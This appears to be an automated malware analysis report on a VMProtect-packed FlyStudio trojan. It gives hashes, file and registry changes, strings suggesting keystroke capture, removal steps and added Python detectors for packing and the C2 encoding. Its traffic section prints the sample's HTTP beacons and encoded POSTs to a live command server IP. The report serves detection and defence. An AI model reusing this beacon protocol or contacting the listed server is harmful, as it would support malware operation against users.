Trojan.Win32.FlyStudio_b14c438e54
HEUR:VirTool.Win32.Generic (Kaspersky), Gen:Variant.Kazy.366076 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: b14c438e5457723d7f8cd445b3d69401
SHA1: 48da1d1b3a2281fb59aa745b7466dd1316e55929
SHA256: b6dde1e3f56b5eab25a35c41e395a955f46e2051f2b2994cd755a48c3ea5214e
SSDeep: 49152:I0GEd/4JQfz5prnQ54QozUZnRQtA4NRrfX8DRGc1yUJGRyZU1c/SjrRNmNC44s9e:IVoJftJi4anRQmYrfM4coUBZ5i l
Size: 3862528 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Fusion Install
Created at: 2014-06-04 10:34:07
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse). FlyStudio is the family name Kaspersky and others use for executables built with Easy Programming Language (EPL); the dump strings below (ESPINN.dll, dywt.com.cn, "runtime library file for EPL applications") confirm that toolchain, and the .vmp0/.vmp1 sections show the binary was additionally wrapped in VMProtect.
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. This verdict is heuristic: the SMTP format strings that trigger it (From:, To:, Subject:, Reply-To:) sit among the EPL runtime library strings in the dump, and no mail traffic was observed in this run, only HTTP to 221.123.147.73. |
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:208 (the sample's own process; the rwx regions dumped below belong to it, consistent with the protected image unpacking itself in place rather than injecting into another process)
Mutexes
The following mutexes were created/opened (all are standard WinINet, urlmon, RAS and application-compatibility mutexes and are not usable as indicators for this sample):
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex
File activity
The process %original file name%.exe:208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s). The Content.IE5 entries are WinINet cache artifacts of the GET to /111.asp (111[1].htm is the 1-byte response body). The two files written to %System% are the sample's own; an 88-byte SkinH_EL.dll is far too small to be a loadable DLL, so that write is incomplete:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes)
Registry activity
The process %original file name%.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry. Most of them (Internet Settings\Cache\Paths, Shell Folders, MigrateProxy, SavedLegacySettings, the ZoneMap defaults and the Cryptography\RNG seed) are what WinINet, shell32 and CryptoAPI write on first use in a fresh profile, so they are side effects of the sample's HTTP requests rather than deliberate persistence; no Run key or service is set. The change with operational effect is the proxy configuration (ProxyEnable = 0 plus the deleted AutoConfigURL, ProxyServer and ProxyOverride values), after which WinINet requests from this user go straight to 221.123.147.73; whether that was done by the sample or by WinINet's proxy-settings migration (MigrateProxy = 1) cannot be told from this report:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 6B C5 B4 5B 9D 0D 06 A1 75 0A AA DC D8 C2 28"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan sets the three Local intranet zone options of IE (the values match the IE defaults on Windows XP and are written as a side effect of the first WinINet/urlmon use):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
"ProxyBypass" = "1"
"IntranetName" = "1"
UNCAsIntranet = 1 places all network paths (UNCs) in the Local intranet zone, ProxyBypass = 1 places all sites that bypass the proxy server there, and IntranetName = 1 places all local sites not listed in other zones (host names without dots) there.
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
147127382e001f495d1842ee7a9e7912 | c:\WINDOWS\system32\SkinH_EL.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 1076750 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 1081344 | 603664 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 1687552 | 401322 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 2088960 | 383528 | 368640 | 1.56795 | 352a9695457ee0ad5ff21f6565a784ad |
.vmp0 | 2473984 | 2517355 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp0 | 4993024 | 49204 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp1 | 5046272 | 3488220 | 3489792 | 5.49416 | bd74e24f97f5e8629357ae467e146b06 |
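The table above is the packer signature in numbers: .text, .rdata, .data and both .vmp0 sections have a raw size of 0 (their section MD5 d41d8cd98f00b204e9800998ecf8427e is the MD5 of zero bytes), so the code only exists in memory after the 3.4 MB .vmp1 section has been unpacked at run time, and .vmp0/.vmp1 are the section names VMProtect emits. The Python below is an added example, not part of the Lavasoft report, that reads a section table with nothing but struct and flags exactly those indicators. It builds a minimal PE whose section layout mirrors this table so that it runs offline; that image and its section contents are constructed for the example, not taken from the analysed file. parse_sections() works unchanged on a real file read from disk (pass the path as the first argument).

```python
"""Flag packer/protector indicators from a PE section table (added example)."""
import hashlib
import math
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table of a file image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    _machine, nsec, _ts, _symptr, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size                      # section headers follow the optional header
    sections = []
    for i in range(nsec):
        (name, vsize, vaddr, rsize, rptr,
         _relptr, _lnptr, _nrel, _nln, flags) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[rptr:rptr + rsize] if rsize else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vaddr": vaddr, "vsize": vsize, "rsize": rsize,
            "entropy": shannon_entropy(raw), "flags": flags,
        })
    return sections


def packing_indicators(sections: list, entropy_threshold: float = 7.0) -> list:
    """Return [(section name, [tags])] in table order; sections with no findings are omitted."""
    findings = []
    for s in sections:
        tags = []
        if s["name"].lower().startswith(".vmp") or s["name"].startswith("UPX"):
            tags.append("protector-section-name")      # VMProtect / UPX naming
        if s["rsize"] == 0 and s["vsize"] > 0:
            tags.append("virtual-only")                 # no bytes on disk, filled at run time
        if s["entropy"] >= entropy_threshold:
            tags.append("high-entropy")                 # compressed or encrypted payload
        if tags:
            findings.append((s["name"], tags))
    return findings


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 whose section layout mirrors the table in this report.
    Synthetic bytes only; nothing here comes from the analysed sample."""
    blob, h = b"", b"vmp1"                            # high-entropy stand-in for the .vmp1 payload
    while len(blob) < 4096:
        h = hashlib.sha256(h).digest()
        blob += h
    rsrc = b"\x00" * 3000 + b"A" * 1096              # low-entropy stand-in for resources
    layout = [  # name, virtual size, virtual address, raw bytes
        (b".text", 1076750, 0x1000, b""),
        (b".rdata", 603664, 0x108000, b""),
        (b".data", 401322, 0x19C000, b""),
        (b".rsrc", 383528, 0x1FE000, rsrc),
        (b".vmp0", 2517355, 0x25C000, b""),
        (b".vmp0", 49204, 0x4C3000, b""),
        (b".vmp1", 3488220, 0x4D0000, blob),
    ]
    opt = struct.pack("<H", 0x10B) + b"\x00" * 222  # PE32 optional header, 224 bytes, mostly zero
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, len(opt), 0x0102)
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    data_off = e_lfanew + 4 + len(coff) + len(opt) + 40 * len(layout)
    table, body = b"", b""
    for name, vsize, vaddr, raw in layout:
        rptr = data_off + len(body) if raw else 0
        table += struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, len(raw), rptr, 0, 0, 0, 0, 0x60000020)
        body += raw
    return dos + b"PE\0\0" + coff + opt + table + body


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for name, tags in packing_indicators(parse_sections(image)):
        print(f"{name:8} {', '.join(tags)}")
```

Three or more virtual-only sections in front of one large high-entropy section is the shape to look for; a benign build has raw bytes for .text and .rdata even when it ships compressed resources.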
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL | IP |
---|---|
hxxp://221.123.147.73/111.asp?post=/33333.mdb2412511990317927241251123456789&2014304352632430223310325223122613267326 | 221.123.147.73 |
hxxp://221.123.147.73/piaoyh.aspx | 221.123.147.73 |
hxxp://221.123.147.73/111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. | 221.123.147.73 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 221.123.147.73
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK; path=/
Cache-control: private

2....
POST /piaoyh.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 12
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK
p=97E121E98E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 32

00280096003A009600E1002800EE003A....
POST /piaoyh.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 191
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK
p=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E101E100E&sbm=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E51E51E51E50E58E58E50E49E50E50E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 339

54E60E63E52E56E54E58E50E121E81E109E109E110E102E46E115E107E107E101E95E124E51E51E51E50E58E59E126E50E50E66E66E50E75E63E52E57E64E69E64E52E60E76E50E69E67E64E55E126E94E120E119E100E126E48E51E67E75E58E67E52E52E59E65E68E73E60E52E71E50E71E70E65E58E78E48E125E49E65E66E51E62E73E55E55E59E59E69E65E61E60E68E49E70E66E58E55E50E58E50E50E51E70E55E64E118E56E....
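The POST bodies are the only part of the exchange that is not plain text: p= and sbm= carry decimal byte values, each terminated by E. The first POST, p=97E121E98E, decodes to the ASCII string ayb; the longer blobs decode to printable but unreadable text, so a further substitution that the report does not show is applied on top. Two other details are worth a detection rule: the client emits a misspelled accept-languge header that no stock browser sends, and the hard-coded User-Agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" from the dump strings is used for the POSTs while the GET carries a different one. The Python below is an added example, not the report's or the vendor's code: it decodes the E-stream encoding and flags the two request shapes seen in the capture. The two sample requests are reassembled from the headers printed above and are constructed input, not the raw capture.

```python
"""Decode the C2 POST encoding and flag the beacon shapes seen in this report (added example)."""
import re
from urllib.parse import parse_qsl

E_STREAM = re.compile(r"^(?:\d{1,3}E)+$")            # e.g. 97E121E98E
CHECKIN_PATH = re.compile(r"^/111\.asp\?post=/33333\.mdb")


def decode_e_stream(value: str) -> bytes:
    """Each token is a decimal byte value terminated by 'E': '97E121E98E' -> b'ayb'."""
    if not E_STREAM.match(value):
        raise ValueError(f"not an E-terminated decimal stream: {value[:24]!r}")
    vals = [int(t) for t in value[:-1].split("E")]
    if max(vals) > 255:
        raise ValueError("token exceeds one byte")
    return bytes(vals)


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, val = line.partition(":")
        headers[name.strip().lower()] = val.strip()
    return method, path, headers, body


def inspect_request(raw: str) -> dict:
    """Return {'hits': [tags], 'decoded': {param: bytes}} for one request."""
    method, path, headers, body = parse_request(raw)
    hits, decoded = [], {}
    if method == "GET" and CHECKIN_PATH.match(path):
        hits.append("checkin-get")
    if method == "POST" and path == "/piaoyh.aspx":
        hits.append("c2-post")
    if "accept-languge" in headers:                     # misspelled header unique to this client
        hits.append("misspelled-accept-language")
    if method == "POST" and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        for key, val in parse_qsl(body, keep_blank_values=True):
            if E_STREAM.match(val):
                decoded[key] = decode_e_stream(val)
                hits.append(f"e-stream-param:{key}")
    return {"hits": hits, "decoded": decoded}


# Constructed sample requests, reassembled from the headers shown in the Traffic section.
SAMPLE_GET = (
    "GET /111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: 221.123.147.73\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
SAMPLE_POST = (
    "POST /piaoyh.aspx HTTP/1.1\r\n"
    "Referer: http://221.123.147.73/piaoyh.aspx\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "accept-languge: zh-CN\r\n"
    "Host: 221.123.147.73\r\n"
    "Content-Length: 12\r\n\r\n"
    "p=97E121E98E"
)

if __name__ == "__main__":
    for sample in (SAMPLE_GET, SAMPLE_POST):
        print(inspect_request(sample))
```

The misspelled header and the E-stream body are the robust parts of this signature; the path names and the IP can change between builds, the client's own request-building code usually does not.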
The Trojan connects to the server at the following location (all observed traffic is HTTP to this one host):
221.123.147.73
Strings from the process memory dumps of %original file name%.exe:208, reduced to the recognisable strings; the rest of the dump is binary noise from the protected image:
PE section names: .text, .rdata, .data, .rsrc, .vmp0, .vmp0, .vmp1
Libraries: kernel32.dll, ntdll.dll, user32.dll, gdi32.dll, advapi32.dll, shell32.dll, shlwapi.dll, ole32.dll, OLEAUT32.dll, WinINet.dll, WS2_32.dll, WSOCK32.dll, RASAPI32.dll, iphlpapi.dll, COMCTL32.dll, comdlg32.dll, MSIMG32.dll, MSVCRT.dll, MSVFW32.dll, WINMM.dll, WINSPOOL.DRV, MPR.dll, VERSION.dll, SkinH_EL.dll
API names: CreateWindowStationA, CloseWindowStation, ExitWindowsEx, HttpOpenRequestA, HttpSendRequestA, HttpQueryInfoA, InternetCrackUrlA, InternetCanonicalizeUrlA, GetTcpTable, GetAsyncKeyState, GetKeyState, SetWindowsHookExA, UnhookWindowsHookEx, RegisterHotKey, UnregisterHotKey, CreatePipe, WinExec, ShellExecuteA, GetWindowsDirectoryA, GetProcessHeap, GetCPInfo, RegOpenKeyA, RegOpenKeyExA, RegCreateKeyExA, RegEnumKeyA, RegDeleteKeyA, RegCloseKey, CreateDialogIndirectParamA, SetViewportOrgEx, OffsetViewportOrgEx, GetViewportOrgEx, SetViewportExtEx, GetViewportExtEx, ScaleViewportExtEx
HTTP client ProgIDs: MSXML2.XMLHTTP, Microsoft.XMLHTTP, MSXML2.ServerXMLHTTP, MSXML2.ServerXMLHTTP.6.0, WinHttp.WinHttpRequest.5.1
Network strings: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0), application/x-www-form-urlencoded, Content-Type: application/x-www-form-urlencoded, HTTP/1.1, HTTP/1.0, http://, http://221.123.147.73/zhuzhou.txt, .asp&SQL=
File and path strings: Freestyle.exe, config.ini, 1.ini, 2.ini, 3.ini, 4.ini, drivers\etc\hosts, c:\11.bmp, %System%\SkinH_EL.dll, %System%\esdpf.she, c:\%original file name%.exe, "C:\Windows\System32\ESPI11.dll", %s\ESPI%d.dll
Other strings: 1990317927@ (the same number appears in the check-in URL), qwertyuiopasdfghjklzxcvbnm (a keyboard-row string; together with GetAsyncKeyState, GetKeyState and SetWindowsHookExA this is consistent with keystroke capture, which the sandbox run did not exercise), TOUCH PASS, rundll32.exe shell32.dll, Bogus message code %d, commctrl_DragListMsg, Afx:%x:%x:%x:%x:%x, CCmdTarget, __MSVCRT_HEAP_SELECT, MFC RTTI names (CException, CNotSupportedException, CFileException, CObject, CSimpleException, CMemoryException, CResourceException, CUserException, CCmdTarget, CCmdUI, CTestCmdUI, CArchiveException), #include "l.chs\afxres.rc" // Standard components, file-dialog filters for *.prn, *.WAV, *.MID, *.txt, *.JPG, *.BMP, *.GIF, *.ICO and *.CUR
SMTP format strings (from the EPL runtime; no mail traffic was seen): %s <%s>, Reply-To: %s, From: %s, To: %s, Subject: %s, Date: %s, Cc: %s, %a, %d %b %Y %H:%M:%S, SMTP, EMSG, Recv Sub Packet(%s), Recv Packet (%s)
EPL (Easy Programming Language) runtime strings: http://dywt.com.cn, www.dywt.com.cn, service@dywt.com.cn, 86(0411)88995834, 86(0411)88995831, ESPINN.dll, "This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit www.dywt.com.cn/info", CallerInfoCopyCmd, SetIPPort, GetIPPort, ProviderInstallCopyCmd, SockDataCopyCmd, SockAddrCopyCmd, enetintercept_fnSockAddrSetIPPort, enetintercept_fnSockAddrGetIPPort, enetintercept_fnInstallCopyCmd, enetintercept_fnSockDataCopyCmd, enetintercept_fnSockAddrCopyCmd, enetintercept_fnCallerInfoCopyCmd
Loader error strings: The procedure entry point %c could not be located in the dynamic link library %s; The ordinal %u could not be located in the dynamic link library %s
Dumped rwx regions: %original file name%.exe_208_rwx_009BC000_00002000 (contains the WININET.dll, ADVAPI32.dll, OLEAUT32.dll and RASAPI32.dll import names listed above), %original file name%.exe_208_rwx_009BF000_00001000 (contains the loader error strings and the USER32.dll, GetProcessHeap, InternetCanonicalizeUrlA and OffsetViewportOrgEx names)
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate the malicious process (How to End a Process With the Task Manager): the only process observed is the sample itself, %original file name%.exe:208; no child processes were created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.